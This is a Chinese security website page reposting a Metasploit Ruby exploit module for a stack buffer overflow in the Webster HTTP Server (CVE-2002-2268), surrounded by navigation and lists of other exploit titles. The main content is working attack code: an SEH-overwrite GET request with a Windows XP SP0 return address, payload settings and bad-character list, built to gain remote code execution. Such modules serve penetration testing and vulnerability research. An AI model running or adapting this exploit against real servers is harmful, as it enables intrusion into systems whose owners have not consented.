首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Webster HTTP Server GET Buffer Overflow(meta)
来源:http://www.metasploit.com 作者:patrick 发布时间:2010-11-05  
##
# $Id: webster_http.rb 10887 2010-11-03 12:19:19Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Webster HTTP Server GET Buffer Overflow',
			'Description'    => %q{
					This exploits a stack buffer overflow in the Webster HTTP server.
					The server and source code was released within an article from
					the Microsoft Systems Journal in February 1996 titled "Write a
					Simple HTTP-based Server Using MFC and Windows Sockets".
			},
			'Author'         => [ 'patrick' ],
			'Version'        => '$Revision: 10887 
, 'References' => [ [ 'CVE', '2002-2268' ], [ 'OSVDB', '44106' ], [ 'BID', '6289' ], [ 'URL', 'http://www.microsoft.com/msj/archive/s25f.aspx' ], [ 'URL', 'http://www.netdave.com/webster/webster.htm' ], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0', { 'Ret' => 0x71aa32ad } ] , # pop esi; pop ebx; ret ws2help.dll winxp [ 'Debug', { 'Ret' => 0x44434241 } ] , # todo - add more targets. ], 'DisclosureDate' => 'Dec 02 2002', 'DefaultTarget' => 0)) end def exploit print_status("Sending request...") seh = generate_seh_payload(target.ret) send_request_raw({ 'uri' => "/" + Rex::Text.rand_text_alphanumeric(266) + seh }, 2) handler end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Network Associates PGP KeyServ
·Internet Explorer CSS Tags Mem
·HtaEdit v 3.2.3.0 (.hta) Buffe
·CA BrightStor ARCserve for Lap
·Crystal Report Viewer v8.0.0.3
·GSPlayer 1.83a Win32 Release B
·Avira Premium Security Suite N
·CA BrightStor ARCserve for Lap
·Minishare 1.5.5 Buffer Overflo
·Internet Explorer Memory Corru
·ColdFusion 8.0.1 Arbitrary Fil
·Avast! Internet Security aswtd
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved